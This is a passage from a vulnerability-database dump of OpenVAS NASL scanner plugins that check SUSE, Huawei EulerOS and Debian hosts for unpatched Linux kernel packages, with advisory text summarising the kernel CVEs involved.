isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra-debuginfo\", rpm:\"kernel-default-extra-debuginfo~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.44~52.10.1\", 
rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.44~52.10.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.12.44~52.10.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:38:33", "bulletinFamily": 
"scanner", "cvelist": ["CVE-2014-9644", "CVE-2014-9715", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-9940", "CVE-2015-0274", "CVE-2014-9728", "CVE-2015-1421", "CVE-2015-1465", "CVE-2014-9730", "CVE-2014-9904", "CVE-2014-9900", "CVE-2014-9895", "CVE-2014-9914", "CVE-2014-9922", "CVE-2015-0239", "CVE-2014-9729", "CVE-2015-1333", "CVE-2015-0275", "CVE-2015-1573", "CVE-2014-9710", "CVE-2014-9731", "CVE-2014-9892"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191485", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191485", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1485)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1485\");\n script_version(\"2020-01-23T15:42:05+0000\");\n script_cve_id(\"CVE-2014-9644\", \"CVE-2014-9710\", \"CVE-2014-9715\", \"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2014-9892\", \"CVE-2014-9895\", \"CVE-2014-9900\", \"CVE-2014-9904\", \"CVE-2014-9914\", \"CVE-2014-9922\", \"CVE-2014-9940\", \"CVE-2015-0239\", \"CVE-2015-0274\", \"CVE-2015-0275\", \"CVE-2015-1333\", \"CVE-2015-1420\", \"CVE-2015-1421\", \"CVE-2015-1465\", \"CVE-2015-1573\", \"CVE-2015-1593\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 15:42:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:53:38 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1485)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1485\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1485\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1485 advisory.\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in the way the Linux kernel's Crypto subsystem handled automatic loading of kernel modules. A local user could use this flaw to load any installed kernel module, and thus increase the attack surface of the running kernel.(CVE-2014-9644)\n\nThe Btrfs implementation in the Linux kernel before 3.19 does not ensure that the visible xattr state is consistent with a requested replacement, which allows local users to bypass intended ACL settings and gain privileges via standard filesystem operations (1) during an xattr-replacement time window, related to a race condition, or (2) after an xattr-replacement attempt that fails because the data does not fit.(CVE-2014-9710)\n\nAn integer overflow flaw was found in the way the Linux kernel's netfilter connection tracking implementation loaded extensions. An attacker on a local network could potentially send a sequence of specially crafted packets that would initiate the loading of a large number of extensions, causing the targeted system in that network to crash.(CVE-2014-9715)\n\nA symlink size validation was missing in Linux kernels built with UDF file system (CONFIG_UDF_FS) support, allowing the corruption of kernel memory. An attacker able to mount a corrupted/malicious UDF file system image could cause the kernel to crash.(CVE-2014-9728)\n\nA symlink size validation was missing in Linux kernels built with UDF file system (CONFIG_UDF_FS) support, allowing the corruption of kernel memory. An attacker able to mount a corrupted/malicious UDF file system image could cause the kernel to crash.(CVE-2014-9729)\n\nA symlink size validation was missing in Linux kernels built with UDF file system (CONFIG_UDF_FS) support, allowing the corruption of kernel memory. 
An attacker able to mount a corrupted/malicious UDF file system image could cause the kernel to crash.(CVE-2014-9730)\n\nA path length checking flaw was found in Linux kernels built with UDF file system (CONFIG_UDF_FS) support. An attacker able to mount a corrupted/malicious UDF file system image could use this flaw to leak kernel memory to user-space.(CVE-2014-9731)\n\nThe snd_compr_tstamp function in sound/core/compress_offload.c in the Linux kernel through 4.7, as used in Android before 2016-08-05 on Nexus 5 and 7 (2013) devices, does not properly initialize a timestamp data structure, which allows attackers to obtain sensitive information via a crafted application, aka Android internal bug 28770164 and Qualcomm internal bug CR568717.(CVE-2014-9892)\n\ndrivers/media/media-device.c in the Linux kernel before 3.11, as used in Android before 2016-08-05 on Nexus 5 and 7 (2013) devices, ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", 
rpm:\"kernel-tools~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9683", "CVE-2014-9585"], "description": "Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a denial of service, information\nleaks or privilege escalation.\n\nCVE-2013-7421 /\nCVE-2014-9644\nIt was discovered that the Crypto API allowed unprivileged users\nto load arbitrary kernel modules. A local user can use this flaw\nto exploit vulnerabilities in modules that would not normally be\nloaded.\n\nCVE-2014-7822\nAkira Fujita found that the splice() system call did not validate\nthe given file offset and length. 
A local unprivileged user can use\nthis flaw to cause filesystem corruption on ext4 filesystems, or\npossibly other effects.\n\nCVE-2014-8160\nFlorian Westphal discovered that a netfilter (iptables/ip6tables) rule\naccepting packets to a specific SCTP, DCCP, GRE or UDPlite\nport/endpoint could result in incorrect connection tracking state.\nIf only the generic connection tracking module (nf_conntrack) was\nloaded, and not the protocol-specific connection tracking module,\nthis would allow access to any port/endpoint of the specified\nprotocol.\n\nCVE-2014-8559\nIt was found that kernel functions that iterate over a directory\ntree can dead-lock or live-lock in case some of the directory\nentries were recently deleted or dropped from the cache. A local\nunprivileged user can use this flaw for denial of service.\n\nCVE-2014-9585\nAndy Lutomirski discovered that address randomisation for the vDSO\nin 64-bit processes is extremely biased. A local unprivileged user\ncould potentially use this flaw to bypass the ASLR protection\nmechanism.\n\nCVE-2014-9683\nDmitry Chernenkov discovered that eCryptfs writes past the end of\nthe allocated buffer during encrypted filename decoding, resulting\nin local denial of service.\n\nCVE-2015-0239\nIt was found that KVM did not correctly emulate the x86 SYSENTER\ninstruction. An unprivileged user within a guest system that has\nnot enabled SYSENTER, for example because the emulated CPU vendor\nis AMD, could potentially use this flaw to cause a denial of\nservice or privilege escalation in that guest.\n\nCVE-2015-1420\nIt was discovered that the open_by_handle_at() system call reads\nthe handle size from user memory a second time after validating\nit. A local user with the CAP_DAC_READ_SEARCH capability could use\nthis flaw for privilege escalation.\n\nCVE-2015-1421\nIt was found that the SCTP implementation could free an\nauthentication state while it was still in use, resulting in heap\ncorruption. 
This could allow remote users to cause a denial of\nservice or privilege escalation.\n\nCVE-2015-1593\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy.\nA local unprivileged user could potentially use this flaw to\nbypass the ASLR protection mechanism.", "modified": "2019-03-18T00:00:00", "published": "2015-02-23T00:00:00", "id": "OPENVAS:1361412562310703170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703170", "type": "openvas", "title": "Debian Security Advisory DSA 3170-1 (linux - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3170.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3170-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703170\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2013-7421\", \"CVE-2014-7822\", \"CVE-2014-8160\", \"CVE-2014-8559\",\n \"CVE-2014-9585\", \"CVE-2014-9644\", \"CVE-2014-9683\", \"CVE-2015-0239\",\n \"CVE-2015-1420\", \"CVE-2015-1421\", \"CVE-2015-1593\");\n script_name(\"Debian Security Advisory DSA 3170-1 (linux - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-23 00:00:00 +0100 (Mon, 23 Feb 2015)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3170.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy),\nthese problems have been fixed in version 3.2.65-1+deb7u2. 
Additionally this update\nfixes regressions introduced in versions 3.2.65-1 and 3.2.65-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be fixed\nsoon (a subset is fixed already).\n\nFor the unstable distribution (sid), these problems will be fixed soon\n(a subset is fixed already).\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a denial of service, information\nleaks or privilege escalation.\n\nCVE-2013-7421 /\nCVE-2014-9644\nIt was discovered that the Crypto API allowed unprivileged users\nto load arbitrary kernel modules. A local user can use this flaw\nto exploit vulnerabilities in modules that would not normally be\nloaded.\n\nCVE-2014-7822\nAkira Fujita found that the splice() system call did not validate\nthe given file offset and length. A local unprivileged user can use\nthis flaw to cause filesystem corruption on ext4 filesystems, or\npossibly other effects.\n\nCVE-2014-8160\nFlorian Westphal discovered that a netfilter (iptables/ip6tables) rule\naccepting packets to a specific SCTP, DCCP, GRE or UDPlite\nport/endpoint could result in incorrect connection tracking state.\nIf only the generic connection tracking module (nf_conntrack) was\nloaded, and not the protocol-specific connection tracking module,\nthis would allow access to any port/endpoint of the specified\nprotocol.\n\nCVE-2014-8559\nIt was found that kernel functions that iterate over a directory\ntree can dead-lock or live-lock in case some of the directory\nentries were recently deleted or dropped from the cache. A local\nunprivileged user can use this flaw for denial of service.\n\nCVE-2014-9585\nAndy Lutomirski discovered that address randomisation for the vDSO\nin 64-bit processes is extremely biased. 
A local unprivileged user\ncould potentially use this flaw to bypass the ASLR protection\nmechanism.\n\nCVE-2014-9683\nDmitry Chernenkov discovered that eCryptfs writes past the end of\nthe allocated buffer during encrypted filename decoding, resulting\nin local denial of service.\n\nCVE-2015-0239\nIt was found that KVM did not correctly emulate the x86 SYSENTER\ninstruction. An unprivileged user within a guest system that has\nnot enabled SYSENTER, for example because the emulated CPU vendor\nis AMD, could potentially use this flaw to cause a denial of\nservice or privilege escalation in that guest.\n\nCVE-2015-1420\nIt was discovered that the open_by_handle_at() system call reads\nthe handle size from user memory a second time after validating\nit. A local user with the CAP_DAC_READ_SEARCH capability could use\nthis flaw for privilege escalation.\n\nCVE-2015-1421\nIt was found that the SCTP implementation could free an\nauthentication state while it was still in use, resulting in heap\ncorruption. 
This could allow remote users to cause a denial of\nservice or privilege escalation.\n\nCVE-2015-1593\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy.\nA local unprivileged user could potentially use this flaw to\nbypass the ASLR protection mechanism.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-ia64\", 
ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-powerpc\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-sparc\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-itanium\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mckinley\", 
ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc-smp\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-s390x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", 
